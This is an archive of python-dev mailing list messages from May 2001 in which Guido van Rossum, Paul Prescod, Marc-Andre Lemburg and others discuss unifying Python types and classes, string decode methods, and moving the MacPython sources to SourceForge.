> only works with class instance objects, not instances of types.
> 
>  Paul Prescod

If you're talking about *instances*: instances of subtypes of built-in
types have a dict of their own to which you can add stuff to your
heart's content.  Instances of built-in types will continue not to
have a dict (it would cost too much space if *every* object had a
dict, even if it was a NULL pointer when no attrs are defined).

If you mean you want to annotate types like you can annotate classes,
that should be possible once I implement what I describe above.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From paulp at ActiveState.com  Fri May 11 01:22:16 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 16:22:16 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <15099.3910.648127.25900@slothrop.digicool.com>
Message-ID: <3AFB22A8.A0A6A4D4@ActiveState.com>

Jeremy Hylton wrote:
> 
> >>>>> "PP" == Paul Prescod <paulp at ActiveState.com> writes:
> 
>   PP> I would like to argue that "plain old C types" should act as if
>   PP> they have __dict__s for consistency with other types. It is
>   PP> sometimes useful to be able to annotate objects by adding
>   PP> attributes to them. But this only works with class instance
>   PP> objects, not instances of types.
> 
> Every type should have an __dict__ of type dict?  Then every dict
> must have an __dict__, including the __dict__ of __dict__?

What's wrong with that? Every object has a type, even type objects, and
type types. It only becomes a problem if you try to recursively walk all
the dictionaries in the system adding information to them. Otherwise
they have null pointers that "act as if" they were empty dictionaries.

> Once every object has an __dict__, every object will be mutable.  Then
> no object will be usable as a dict key and we can get rid of dict's
> entirely.

According to that argument, instances cannot be dictionary keys. That is
simply not true. Objects do not implement their hash functions in terms
of ALL of their attributes!

-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From mwh at python.net  Fri May 11 01:31:53 2001
From: mwh at python.net (Michael Hudson)
Date: Fri, 11 May 2001 00:31:53 +0100 (BST)
Subject: [Python-Dev] python-dev summary 2001-04-26 - 2001-05-10
Message-ID: <Pine.LNX.4.30.0105110031170.14911-100000@localhost.localdomain>

 This is a summary of traffic on the python-dev mailing list between
 Apr 26 and May 9 (inclusive) 2001.  It is intended to inform the
 wider Python community of ongoing developments.  To comment, just
 post to python-list at python.org or comp.lang.python in the usual
 way. Give your posting a meaningful subject line, and if it's about a
 PEP, include the PEP number (e.g. Subject: PEP 201 - Lockstep
 iteration) All python-dev members are interested in seeing ideas
 discussed by the community, so don't hesitate to take a stance on a
 PEP if you have an opinion.

 This is the seventh summary written by Michael Hudson.
 Summaries are archived at:

  <http://starship.python.net/crew/mwh/summaries/>

   Posting distribution (with apologies to mbm)

   Number of articles in summary: 228

    40 |                         [|]
       |                         [|]
       |                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    30 |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
       |                         [|]                         [|]
    20 |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|]                     [|]
       |     [|]                 [|] [|] [|]                 [|]
       |     [|]                 [|] [|] [|]             [|] [|]
       |     [|]                 [|] [|] [|]             [|] [|]
    10 |     [|]                 [|] [|] [|]         [|] [|] [|]
       |     [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
       | [|] [|] [|]     [|] [|] [|] [|] [|] [|]     [|] [|] [|]
     0 +-007-024-010-001-010-010-044-023-019-010-002-012-017-039
        Thu 26| Sat 28| Mon 30| Wed 02| Fri 04| Sun 06| Tue 08|
            Fri 27  Sun 29  Tue 01  Thu 03  Sat 05  Mon 07  Wed 09

  A fairly quiet, but interesting fortnight (and I don't mean the
  sarcastic replies to the Homepage virus).  A few build problems and
  bugs fixed, and one very involved discussion (cf. most of the rest
  of this summary).


    * type == class? *

 Guido posted a message from Jim Althoff describing the metaclass
 system used in Smalltalk:

  <http://mail.python.org/pipermail/python-dev/2001-May/014508.html>

 He also mentioned a problem that is bound to bite any attempt to heal
 the type/class split in Python.  If there are to be no special cases
 in the type system then classes and types in particular should be
 instances.  This sounds innocuous, but consider:

    class MyDictType(DictType):
        def __repr__(self):
            return "MyDictType(%s)" % DictType.__repr__(self)

 The code is hoping that, as in today's Python, DictType.__repr__ will
 return an unbound method - the __repr__ method of vanilla
 dictionaries, so that output of the form

    MyDictType({1:2})

 will be given.  But DictType is now an instance, so there's another
 interpretation for DictType.__repr__ - the bound DictType's own
 __repr__ method!  This is a fundamental problem; currently
 "class.attr" and "instance.attr" have different meanings in Python,
 and any attempt to conflate the notions of "class" and "instance" is
 bound to run aground.  Guido proposed some hairy disambiguation rules
 in the above-linked message, but no-one was particularly enthused
 about them, possibly because no-one could really get their head round
 them.

 The long term solution is to change the syntax for getting - or
 removing entirely - unbound methods.  As far as anyone can make out,
 all that unbound methods are used for is called superclasses' methods
 from overriding methods, so if one can find another way of spelling
 that, then removing unbound methods entirely could be contemplated.
 So the discussion on that went around for a bit, with no really new
 compelling ideas surfacing.  There was some support for some kind of
 souped up super.foo() construct:

  <http://mail.python.org/pipermail/python-dev/2001-May/014523.html>

 To me, the most plausible ideas came from Thomas Heller:

  <http://mail.python.org/pipermail/python-dev/2001-May/014517.html>

 and from Paul Dubois, who suggested nicking the feature renaming
 feature from Eiffel:

  <http://mail.python.org/pipermail/python-dev/2001-May/014573.html>

 though the best syntax for the latter is far from clear.

 There's also the king-sized issue of backwards compatibility; to a
 first degree of approximation, *all* Python code that uses
 inheritance would need to be updated to accommodate changes in the
 meaning of "class.attribute".  Another __future__ statement, maybe?


    * data.decode *

 Marc-Andre Lemburg asked if it might be an idea if string objects
 sprouted an .decode method:

  <http://mail.python.org/pipermail/python-dev/2001-May/014547.html>

 After some umming and arring and accusations of bloat, this got BDFL
 approval, and should appear in CVS imminently.


    * Moving MacPython to sourceforge *

 Jack Jansen posted notice that he intends to move the MacPython code
 over to sourceforge:

  <http://mail.python.org/pipermail/python-dev/2001-May/014611.html>

 It will be nice to finally have all the code in the same place!

Cheers,
M.


From paulp at ActiveState.com  Fri May 11 02:26:43 2001
From: paulp at ActiveState.com (Paul Prescod)
Date: Thu, 10 May 2001 17:26:43 -0700
Subject: [Python-Dev] Type/class
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>
Message-ID: <3AFB31C3.5CEF9064@ActiveState.com>

Guido van Rossum wrote:
> 
>...
> 
> Good point.  Plain old types currently (in the descr-branch) have a
> readonly dict (using a proxy) and no settable attributes.  I will
> probably give types settable attributes in a next revision, but I
> prefer not to make the type's dict writable -- I need to be able to
> watch the setattr calls so that if someone changes
> DictType.__getitem__ I can change the mp_subscript to a C function
> that calls the __getitem__ method.  

I'm happy to have you look and see if I'm setting something magical. But
if I'm not, I would like you to just add the thing I made to an internal
private dictionary and remember it. I think that's what you are talking
about.

>...
> If you're talking about *instances*: instances of subtypes of built-in
> types have a dict of their own to which you can add stuff to your
> heart's content.  Instances of built-in types will continue not to
> have a dict (it would cost too much space if *every* object had a
> dict, even if it was a NULL pointer when no attrs are defined).

Darn. That *is* what I was hoping for.

There is an implementation that is slowish if you use it, but has little
cost if you don't: keep a big dict mapping object pointers to their
associated dictionaries (if any). For purposes of discussion, call it
sys._associations. Then have the getattr on "PyObject" look in this dict
of dicts for attributes that it can't otherwise find, and setattr
construct dictionaries in the dict of dicts if necessary.

That's the usual workaround anyhow so this would be a nicer syntax and a
more orthoganal model.

Price: a hasattr that would return false or getattr that would raise
AttributeError would be a little slower. They would have to check the
dictionary of dictionaries before deciding that they really don't have
the attribute.
-- 
Take a recipe. Leave a recipe.  
Python Cookbook!  http://www.ActiveState.com/pythoncookbook


From guido at digicool.com  Fri May 11 03:57:36 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 10 May 2001 20:57:36 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 17:26:43 MST."
             <3AFB31C3.5CEF9064@ActiveState.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com>  
            <3AFB31C3.5CEF9064@ActiveState.com> 
Message-ID: <200105110157.UAA03123@cj20424-a.reston1.va.home.com>

> > Good point.  Plain old types currently (in the descr-branch) have a
> > readonly dict (using a proxy) and no settable attributes.  I will
> > probably give types settable attributes in a next revision, but I
> > prefer not to make the type's dict writable -- I need to be able to
> > watch the setattr calls so that if someone changes
> > DictType.__getitem__ I can change the mp_subscript to a C function
> > that calls the __getitem__ method.  
> 
> I'm happy to have you look and see if I'm setting something magical. But
> if I'm not, I would like you to just add the thing I made to an internal
> private dictionary and remember it. I think that's what you are talking
> about.

OK, we agree on this one.

> >...
> > If you're talking about *instances*: instances of subtypes of built-in
> > types have a dict of their own to which you can add stuff to your
> > heart's content.  Instances of built-in types will continue not to
> > have a dict (it would cost too much space if *every* object had a
> > dict, even if it was a NULL pointer when no attrs are defined).
> 
> Darn. That *is* what I was hoping for.
> 
> There is an implementation that is slowish if you use it, but has little
> cost if you don't: keep a big dict mapping object pointers to their
> associated dictionaries (if any). For purposes of discussion, call it
> sys._associations. Then have the getattr on "PyObject" look in this dict
> of dicts for attributes that it can't otherwise find, and setattr
> construct dictionaries in the dict of dicts if necessary.
> 
> That's the usual workaround anyhow so this would be a nicer syntax and a
> more orthoganal model.
> 
> Price: a hasattr that would return false or getattr that would raise
> AttributeError would be a little slower. They would have to check the
> dictionary of dictionaries before deciding that they really don't have
> the attribute.

Personally, if you want this outrageous implementation, you should be
paying for it, not the infrastructure.  It feels contrary to Python's
treatment of objects.  I don't like elaborate workarounds in the
implementation like this -- probably because the performance model
becomes muddy.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From greg at cosc.canterbury.ac.nz  Fri May 11 03:05:11 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 11 May 2001 13:05:11 +1200 (NZST)
Subject: [Python-Dev] Type/class
In-Reply-To: <3AFB22A8.A0A6A4D4@ActiveState.com>
Message-ID: <200105110105.NAA17698@s454.cosc.canterbury.ac.nz>

Paul Prescod <paulp at ActiveState.com>:

> Otherwise
> they have null pointers that "act as if" they were empty
> dictionaries.

Actually, they need to act as if they were empty except for
a "__dict__" slot which contains another one of these magic
things. :-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From barry at digicool.com  Fri May 11 05:45:38 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 10 May 2001 23:45:38 -0400
Subject: [Python-Dev] Interview with Mark Lutz
Message-ID: <15099.24674.311472.184935@anthem.wooz.org>

Great interview with Mark on the ORA site, linked from /.

    http://python.oreilly.com/news/python_0501.html

-Barry


From fredrik at effbot.org  Fri May 11 07:57:34 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 07:57:34 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org>
Message-ID: <022d01c0d9eb$d3e3d680$e46940d5@hagrid>

barry wrote:

> Great interview with Mark on the ORA site, linked from /.
> 
>     http://python.oreilly.com/news/python_0501.html

you mean that python-devers read slashdot for python news,
when you have the daily url:

    http://www.pythonware.com/daily

Cheers /F


From thomas at xs4all.net  Fri May 11 11:02:26 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Fri, 11 May 2001 11:02:26 +0200
Subject: [Python-Dev] Re: test_mmap failing?
In-Reply-To: <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Thu, May 10, 2001 at 10:57:59AM -0400
References: <LNBBLJKPBEHFEDALKOLCKEEDKBAA.tim.one@home.com> <15098.44151.714757.997613@cj42289-a.reston1.va.home.com>
Message-ID: <20010511110226.M16486@xs4all.nl>

On Thu, May 10, 2001 at 10:57:59AM -0400, Fred L. Drake, Jr. wrote:

[ Fred violates Tim's Rule #1 (don't ever use 'foo' for anything) and gets
  bitten in the derriere ]

>   This begs the question, though -- should tests that create temp
> files check that the files don't already exist, and fail with a more
> descriptive error if they do?

I'd think so, yes. I'd also suggest nothing uses something as lamenamed as
'foo', 'test' or 'spam' -- I'm sure Tim will agree with me, at least on the
first account :) How about mmap calls its test-testfile 'test_mmap.foo' ?

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From mal at lemburg.com  Fri May 11 11:34:25 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:34:25 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3AFBB221.F29BCB9A@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > I've attached the patch. Due to a small reorganisation the patch is
> > a little longer -- symmetry has its price at C level too ;-)
> 
> I may be being dense, but can you explain what's going on here:
> 
> ->> u'\u00e3'.encode('latin-1')
> '\xe3'
> ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> Traceback (most recent call last):
>   File "<input>", line 1, in ?
> UnicodeError: ASCII encoding error: ordinal not in range(128)

The string.decode() method will try to reuse the Unicode
codecs here. To do this, it will have to convert the string
to Unicode first and this fails due to the character not being
in the ASCII range.

> Can you come up with some other example I can use it tomorrow's
> python-dev summary?

I will add some codecs which make the .decode() method useful
next week. The ones I have in mind are base64, hex and some of
the other binascii codecs. Also, the ROT13 codec I posted will
go into the core as simple example.

With those you will be able to write:

data.encode('base64').decode('base64')

and get back data.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Fri May 11 11:43:14 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Fri, 11 May 2001 11:43:14 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com>
Message-ID: <049801c0d9fe$cd98aef0$e46940d5@hagrid>

mal wrote:

> > I may be being dense, but can you explain what's going on here:
> > 
> > ->> u'\u00e3'.encode('latin-1')
> > '\xe3'
> > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > Traceback (most recent call last):
> >   File "<input>", line 1, in ?
> > UnicodeError: ASCII encoding error: ordinal not in range(128)
> 
> The string.decode() method will try to reuse the Unicode
> codecs here. To do this, it will have to convert the string
> to Unicode first and this fails due to the character not being
> in the ASCII range.

can you take that again?  shouldn't michael's example be
equivalent to:

    unicode(u"\u00e3".encode("latin-1"), "latin-1")

if not, I'd argue that your "decode" design is broken, instead
of just buggy...

Cheers /F


From mal at lemburg.com  Fri May 11 11:50:24 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 11:50:24 +0200
Subject: [Python-Dev] Interview with Mark Lutz
References: <15099.24674.311472.184935@anthem.wooz.org> <022d01c0d9eb$d3e3d680$e46940d5@hagrid>
Message-ID: <3AFBB5E0.620710C8@lemburg.com>

Fredrik Lundh wrote:
> 
> barry wrote:
> 
> > Great interview with Mark on the ORA site, linked from /.
> >
> >     http://python.oreilly.com/news/python_0501.html
> 
> you mean that python-devers read slashdot for python news,
> when you have the daily url:
> 
>     http://www.pythonware.com/daily

I just bought one of those nice machines that can run pippy
and was wondering how to get AvantGo (the channel software that
comes with it) to synchronize with your daily URL... wouldn't it
be possible to setup a channel for this ? The AvantGo channels
can be registered at their site (http://www.avantgo.com), but the
contents would have to be "mobile friendly"... anyway, just a 
thought ;-)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Fri May 11 12:07:40 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Fri, 11 May 2001 12:07:40 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <m38zk6s2kl.fsf@atrus.jesus.cam.ac.uk> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid>
Message-ID: <3AFBB9EC.F75C158D@lemburg.com>

Fredrik Lundh wrote:
> 
> mal wrote:
> 
> > > I may be being dense, but can you explain what's going on here:
> > >
> > > ->> u'\u00e3'.encode('latin-1')
> > > '\xe3'
> > > ->> u'\u00e3'.encode("latin-1").decode("latin-1")
> > > Traceback (most recent call last):
> > >   File "<input>", line 1, in ?
> > > UnicodeError: ASCII encoding error: ordinal not in range(128)
> >
> > The string.decode() method will try to reuse the Unicode
> > codecs here. To do this, it will have to convert the string
> > to Unicode first and this fails due to the character not being
> > in the ASCII range.
> 
> can you take that again?  shouldn't michael's example be
> equivalent to:
> 
>     unicode(u"\u00e3".encode("latin-1"), "latin-1")
> 
> if not, I'd argue that your "decode" design is broken, instead
> of just buggy...

Well, it is sort of broken, I agree. The reason is that 
PyString_Encode() and PyString_Decode() guarantee the returned
object to be a string object. To be able to reuse Unicode codecs
I added code which converts Unicode back to a string in case the
codec return an Unicode object (which the .decode() method does).
This is what's failing.

Perhaps I should simply remove the restriction and have both
APIs return the codec's return object as-is ?! (I would be in
favour of this, but I'm not sure whether this is already in use 
by someone...)

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From guido at digicool.com  Fri May 11 15:31:18 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 08:31:18 -0500
Subject: [Python-Dev] Type/class
In-Reply-To: Your message of "Thu, 10 May 2001 20:57:36 EST."
             <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
References: <3AFB0E58.1F0ABCA6@ActiveState.com> <200105110003.TAA02924@cj20424-a.reston1.va.home.com> <3AFB31C3.5CEF9064@ActiveState.com>  
            <200105110157.UAA03123@cj20424-a.reston1.va.home.com> 
Message-ID: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>

> > > Good point.  Plain old types currently (in the descr-branch) have a
> > > readonly dict (using a proxy) and no settable attributes.  I will
> > > probably give types settable attributes in a next revision, but I
> > > prefer not to make the type's dict writable -- I need to be able to
> > > watch the setattr calls so that if someone changes
> > > DictType.__getitem__ I can change the mp_subscript to a C function
> > > that calls the __getitem__ method.  

Alas, I think I'll have to withdraw this promise for now.  The truly
built-in types are static objects that are shared between all
interpreter instances within one process, and each type has only one
dictionary pointer.  So changes to the __dict__ would affect other
interpreter instances, and that's unacceptable.

I've thought about alternatives; I can't give each interpreter its own
set of types because sometimes objects are shared between interpreters
(e.g. the dictionary of interned strings), and then then their types
have to be shared too!  Not having any object sharing would mean too
much of a change to the foundations of the implementation.

I think we'll have to live with this restriction until Python 3000.
Personally, I don't mind -- I see mostly possible abuses for the
ability to change attributes of e.g. DictType or StringType. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From sdm7g at Virginia.EDU  Fri May 11 15:43:32 2001
From: sdm7g at Virginia.EDU (Steven D. Majewski)
Date: Fri, 11 May 2001 09:43:32 -0400 (EDT)
Subject: [Python-Dev] Type/class
In-Reply-To: <200105111331.IAA04171@cj20424-a.reston1.va.home.com>
Message-ID: <Pine.NXT.4.21.0105110919490.501-100000@localhost>


Catching up on this thread -- mostly because it looks like I'm
going to have to use ExtensionClass to make pyobjc classes into
python classes rather than types -- you can add that to the 
lisp of real world uses of Don's  Metaclass hack that Tim  
questioned. 

 Reading up on MetaClasses in Smalltalk again makes me appreciate
the simplicity of a prototype system where everything is just
an object -- all objects can be cloned, and some objects are 
only used for cloning -- they are the exemplars of their type
which fill the role of Classes. 

 Unfortunately, although prototypes would be a lot simpler, it 
would be a pretty incompatible change for Python -- I can't think
of any way to get there without a lot of breakage. 

 (Still -- I wonder if there's a way they could be used under
the covers in the implementation to make it simpler. Prototype
semantics are basically a superset of Class based semantics, which
is how it was easy to do Smalltalk in Self.)

 Classes are necessary for statically typed O-O languages, but 
IMHO, make a lot less sense for dynamic languages. If Py3K were
to be a clean start, I'ld urge basing it on prototypes, but as
an incremental creation -- I don't know how to get there from 
here (unless it could sneak in under the implementation covers!)


 BTW: XlispStat, which has a prototype object system with multiple
inheritence also doesn't have "super" -- there is a 
(call-next-method [ args... ]) function/macro which searches for
 the base classes. I'm sure there's a lower level function to 
 just get the next method, but typically, call-next-method is
 what's used. There is no search for non-method attributes, as
 all of the base class instance vars are merged and made into
 slots of the instance itself. ( There's no class variables -- 
 there's no classes.) 

 The closest python equivalent would be, as has been discussed
in this thread, a  super method or function that does attribute
 lookup on the bases. 


-- Steve Majewski


From nas at python.ca  Fri May 11 16:06:39 2001
From: nas at python.ca (Neil Schemenauer)
Date: Fri, 11 May 2001 07:06:39 -0700
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>; from noreply@sourceforge.net on Fri, May 11, 2001 at 06:35:28AM -0700
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>
Message-ID: <20010511070639.A1402@glacier.fnational.com>

noreply at sourceforge.net wrote:
> Module objects currently don't define the tp_getattro 
> or tp_setattro slots.  As a result, interning of 
> attribute names does them no good:  a char* is always 
> passed, so the dict lookup always needs to do a string 
> compare despite that the attribute name is interned.

I think this is a problem in classobject.c:generic_binary_op as
well.  PyObject_GetAttrString is always used.  I believe the old
code interned names like "__add__" and used PyObject_GetAttr.  Is
it worth fixing this?

  Neil


From guido at digicool.com  Fri May 11 17:13:56 2001
From: guido at digicool.com (Guido van Rossum)
Date: Fri, 11 May 2001 10:13:56 -0500
Subject: [Python-Dev] Re: Change module attribute get & set
In-Reply-To: Your message of "Fri, 11 May 2001 07:06:39 MST."
             <20010511070639.A1402@glacier.fnational.com> 
References: <E14yD4q-0001Au-00@usw-sf-web1.sourceforge.net>  
            <20010511070639.A1402@glacier.fnational.com> 
Message-ID: <200105111513.KAA04872@cj20424-a.reston1.va.home.com>

> I think this is a problem in classobject.c:generic_binary_op as
> well.  PyObject_GetAttrString is always used.  I believe the old
> code interned names like "__add__" and used PyObject_GetAttr.  Is
> it worth fixing this?

Maybe.  I'd give this low priority.  If my descriptor branch work goes
well, most of classobject.c *may* disappear in favor of the newly
swollen typeobject.c. ;-)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From jack at oratrix.nl  Fri May 11 16:29:24 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:29:24 +0200
Subject: [Python-Dev] Mac CVS repository moved to sourceforge
Message-ID: <20010511142924.C8037303181@snelboot.oratrix.nl>

Folks,
the Python/Mac repository has been moved to sourceforge, and is integrated 
with the general Python repository, so from now on a single CVS tree suficces 
to build MacPython.

I'm setting the old pythoncvs.oratrix.nl repository to readonly for a few more 
weeks and then it'll disappear.

Note that the pythoncvs.oratrix.nl repository is still the source for some of 
the optional libraries you need to build MacPython, but that's only if you 
want to build it completely from CVS.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From martin at loewis.home.cs.tu-berlin.de  Fri May 11 16:41:33 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Fri, 11 May 2001 16:41:33 +0200
Subject: [Python-Dev] Mac hierarchy backwards
Message-ID: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>

First, thanks to Jack Jansen for integrating the Mac sources; this is
a good thing.

It seems, however, that some of the directory structure is backwards:
Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
may be others of this kind.

I also wonder whether all these files are still needed, and meant to
be distributed. E.g. I see chdir.c having the comment

/* Chdir for the Macintosh.
   Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
   Pathnames must be Macintosh paths, with colons as separators. */

Is it really the case that the Mac API hasn't grown a chdir call in 13
years?

Regards,
Martin


From fdrake at acm.org  Fri May 11 16:55:33 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Fri, 11 May 2001 10:55:33 -0400 (EDT)
Subject: [Python-Dev] Mac hierarchy backwards
In-Reply-To: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
References: <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de>
Message-ID: <15099.64869.626588.775895@cj42289-a.reston1.va.home.com>

Martin v. Loewis writes:
 > It seems, however, that some of the directory structure is backwards:
 > Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
 > may be others of this kind.

  I agree that this should be the goal; I don't know if Jack's release
procedure would need to be revised before that can happen.  If so, I'd
encourage him to do so.

 > Is it really the case that the Mac API hasn't grown a chdir call in 13
 > years?

  Yikes!  I just search developer.apple.com for "chdir" and came up
with no hits, but I really don't know just what that tells me.
chdir() is required for POSIX compliance, but it isn't mentioned in
the C9X final committee draft.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From jack at oratrix.nl  Fri May 11 16:56:39 2001
From: jack at oratrix.nl (Jack Jansen)
Date: Fri, 11 May 2001 16:56:39 +0200
Subject: [Python-Dev] Mac hierarchy backwards 
In-Reply-To: Message by "Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>
  ,
	     Fri, 11 May 2001 16:41:33 +0200 , <200105111441.f4BEfXS01559@mira.informatik.hu-berlin.de> 
Message-ID: <20010511145640.9FCB5303181@snelboot.oratrix.nl>

> It seems, however, that some of the directory structure is backwards:
> Mac/Demo should be Demo/Mac, and Mac/Tools should be Tools/Mac. There
> may be others of this kind.

Yes, now that the Mac stuff is integrated with the mainstream again this might 
be a good idea.

> I also wonder whether all these files are still needed, and meant to
> be distributed. E.g. I see chdir.c having the comment
> 
> /* Chdir for the Macintosh.
>    Public domain by Guido van Rossum, CWI, Amsterdam (July 1987).
>    Pathnames must be Macintosh paths, with colons as separators. */
> 
> Is it really the case that the Mac API hasn't grown a chdir call in 13
> years?

Hmm, hmm, I'm unsure.

MacOS (<= 9) itself doesn't have chdir, because it doesn't believe in current 
directories (by design. Whether I agree with the design is a different 
matter:-).

Normally MacPython is built with a special unix-compatibility library, GUSI, 
which does provide these calls. However, it is still possible to build without 
GUSI, and actually in the process of porting MacPython to Carbon ("MacOSX in 
it's MacOS API model") I've used these compatibility routines again, until I 
finally got GUSI ported.

But its easy enough to cvs-remove them from the normal tree, to be revived 
when needed. What do people think?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From pedroni at inf.ethz.ch  Fri May 11 16:56:48 2001
From: pedroni at inf.ethz.ch (Samuele Pedroni)
Date: Fri, 11 May 2001 16:56:48 +0200 (MET DST)
Subject: [Python-Dev] Type/class
Message-ID: <200105111456.QAA00228@core.inf.ethz.ch>

Hi.

> 
>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
I agree, I often read that Smalltalk is "simple" up to metaclasses,
on the other hand the casual user can just ignore them.

>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)
> 
[Ignoring the fact that code and changes require coders]

Thinking in terms of proto-objects, parent slots and list parent slots:

python instance I have data slots and a parent slot __class__,

python classe G have data slots and a list parent slot __bases__,

then we have the python rules (not very uniforms):
function from I directly => function
function from I.__class__ => bound method
function from C => unbound method

That's the difficult part for every model that aims to remain compatible.

Samuele Pedroni.


From thomas.heller at ion-tof.com  Fri May 11 17:40:10 2001
From: thomas.heller at ion-tof.com (Thomas Heller)
Date: Fri, 11 May 2001 17:40:10 +0200
Subject: [Python-Dev] Type/class
References: <Pine.NXT.4.21.0105110919490.501-100000@localhost>
Message-ID: <016d01c0da30$a99a9720$e000a8c0@thomasnotebook>

>  Reading up on MetaClasses in Smalltalk again makes me appreciate
> the simplicity of a prototype system where everything is just
> an object -- all objects can be cloned, and some objects are 
> only used for cloning -- they are the exemplars of their type
> which fill the role of Classes. 
> 
>  Unfortunately, although prototypes would be a lot simpler, it 
> would be a pretty incompatible change for Python -- I can't think
> of any way to get there without a lot of breakage. 
> 
>  (Still -- I wonder if there's a way they could be used under
> the covers in the implementation to make it simpler. Prototype
> semantics are basically a superset of Class based semantics, which
> is how it was easy to do Smalltalk in Self.)

I never looked at Self or other prototype based systems.
